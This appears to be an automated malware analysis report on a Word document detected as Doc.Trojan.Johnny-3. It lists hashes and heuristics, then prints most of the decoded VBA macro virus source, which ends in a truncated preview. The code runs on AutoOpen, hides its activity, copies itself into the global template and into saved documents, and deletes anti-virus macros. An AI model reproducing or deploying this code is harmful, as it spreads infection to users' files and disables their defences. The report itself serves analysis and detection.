Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 32d0361094bac075…

MALICIOUS

Office (OLE)

Size: 37.5 KB
Created: 2002-03-17 14:59:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b669270167ff114b56a8988b2dc85782
SHA-1: aaf0ae085bfb68e600e27cb367ca60710b2952ae
SHA-256: 32d0361094bac075444cdb37f7d64f88a19d6d8139e44f29e864ed86692c0bae
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Johnny-3'. It contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro's logic suggests it attempts to copy itself to other documents, a common technique for macro-based malware propagation.

Heuristics 4

  • [critical] ClamAV: Doc.Trojan.Johnny-3 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Johnny-3
  • [medium] VBA macros detected, 1 related finding (OLE_VBA_MACROS)
    Document contains VBA macro code
  • [high] AutoOpen macro (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • [medium] Legacy WordBasic auto-exec macro marker (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18133 bytes
SHA-256: aed446ad6ab4f82871a07636b1522001772f016d5523c4cf86dd4970678f5e09

Preview of the extracted script (first 1,000 lines):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "vGojohnny"

Public Sub MAIN()
'Our devise - A copy of "Go Johnny Go" on every computer !

'                                       M.H., E.R.
End Sub

Attribute VB_Name = "Presentz"

Public Sub MAIN() 'fs
Dim d$
Dim MH
Dim i
Dim A$
Dim lnh1
Dim dlg As Object
Dim iMC
Dim BI
On Error GoTo -1: On Error GoTo aend
WordBasic.ScreenUpdating (0)
WordBasic.DisableInput 1
d$ = WordBasic.[FileName$]()
MH = Len(d$)
For i = 0 To MH
A$ = WordBasic.[Right$](d$, i)
A$ = WordBasic.[Left$](WordBasic.[LTrim$](A$), 1)
If A$ = "\" Then GoTo cnt
Next i
cnt:
lnh1 = i - 1
If MH - lnh1 = 0 Then
On Error GoTo -1: On Error GoTo ecss
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.PrintStatusBar "For Help, press F1"
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
MC
WordBasic.MacroCopy "Global:Presentz", WordBasic.[FileName$]() + ":FileSave"
WordBasic.FileSaveAs dlg
GoTo aend
Else
If WordBasic.[Right$](d$, 3) = "DOC" Then
MC
WordBasic.FileSaveAs Format:=1
Else
WordBasic.FileSave
End If
End If
ecss:
If Err.Number = 102 Then GoTo aend
aend:
On Error GoTo -1: On Error GoTo aen
iMC = WordBasic.CountMacros(0, 0)
For i = 1 To iMC
If WordBasic.[MacroName$](i, 0, 0) = "FileSaveAs" Then
BI = 1
End If
If WordBasic.[MacroName$](i, 0, 0) = "DrWebScan" Then
WordBasic.Organizer Delete:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="DrWebScan", Tab:=3
End If
If WordBasic.[MacroName$](i, 0, 0) = "FileOpen" Then
WordBasic.Organizer Delete:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="FileOpen", Tab:=3
End If
Next i
If BI = 0 Then
WordBasic.MacroCopy d$ + ":Presentw", "Global:FileSaveAs"
End If
aen:
End Sub
Private Sub MC()
Dim ds$
ds$ = WordBasic.[FileName$]()
WordBasic.MacroCopy "Global:Presentv", ds$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Presentv", ds$ + ":Presentv"
WordBasic.MacroCopy "Global:Presentw", ds$ + ":Presentw"
WordBasic.MacroCopy "Global:Presentz", ds$ + ":Presentz"
WordBasic.MacroCopy "Global:vGojohnny", ds$ + ":vGojohnny"
End Sub

Attribute VB_Name = "Presentw"

Public Sub MAIN() 'fsAs
Dim d$
Dim Dl
Dim i
Dim A$
Dim lnh1
Dim dlg As Object
Dim NO$
Dim O_D_P$
Dim TMP$
Dim stt$
Dim tm$
Dim tm2$
Dim FileN$
Dim NDPh$
On Error GoTo -1: On Error GoTo aend
WordBasic.ScreenUpdating (0)
WordBasic.DisableInput 1
d$ = WordBasic.[FileName$]()
Dl = Len(d$)
For i = 0 To Dl
A$ = WordBasic.[Right$](d$, i)
A$ = WordBasic.[Left$](WordBasic.[LTrim$](A$), 1)
If A$ = "\" Then GoTo cnt
Next i
cnt:
lnh1 = i - 1
If Dl - lnh1 = 0 Then
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
MC
WordBasic.FileSaveAs dlg
GoTo aend
End If
NO$ = LCase(WordBasic.[Right$](d$, lnh1))
O_D_P$ = WordBasic.[DefaultDir$](14)
TMP$ = WordBasic.[DefaultDir$](13)
stt$ = TMP$ + "\doc2.doc"
tm$ = TMP$ + "\" + NO$
tm2$ = TMP$ + "\~wrf7mhr.tmp"
If WordBasic.[Files$](tm2$) = "" Then
WordBasic.FileNewDefault
WordBasic.Insert "NAIPESVOH REHM"
WordBasic.PrintStatusBar "Starting Autosave"
WordBasic.FileSaveAs Name:=TMP$ + "\doc2.doc", Format:=0
WordBasic.FileClose
WordBasic.Rename TMP$ + "\doc2.doc", tm2$
End If
WordBasic.CopyFile FileName:=tm2$, Directory:=tm$
WordBasic.FileOpen tm$
WordBasic.PrintStatusBar "For Help, press F1"
On Error GoTo -1: On Error GoTo ife
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
dlg.Name = NO$
WordBasic.Dialog.FileSaveAs dlg
FileN$ = dlg.Name
NDPh$ = WordBasic.[DefaultDir$](14)
If Len(NDPh$) > 3 Then NDPh$ = NDPh$ + "\"
If dlg.Format > 1 Then
WordBasic.FileClose 2
WordBasic.Kill tm$
WordBasic.FileSaveAs N
... (truncated)